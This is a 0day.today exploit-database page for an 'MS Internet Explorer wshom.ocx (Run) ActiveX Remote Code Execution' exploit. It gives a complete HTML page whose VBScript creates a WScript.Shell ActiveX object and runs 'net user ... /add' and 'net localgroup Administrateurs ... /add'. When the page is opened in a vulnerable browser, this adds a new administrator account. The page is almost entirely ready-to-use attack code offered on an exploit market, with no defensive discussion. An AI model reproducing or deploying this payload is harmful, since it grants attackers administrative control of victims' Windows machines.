[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MS Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution

Author
Stack
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10156
Category
remote exploits
Date add
22-01-2010
Platform
unsorted
====================================================================================
MS Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
====================================================================================

# Exploit Title: IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
# Author: Stack
# Version: ALL
# Tested on: winsp2

<html>
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target'
></object>
<script language='vbscript'>
 
arg1="cmd /c net user username password /add && net localgroup Administrateurs username /add"
 
target.run arg1
 
</script></p>



#  0day.today [2024-11-15]  #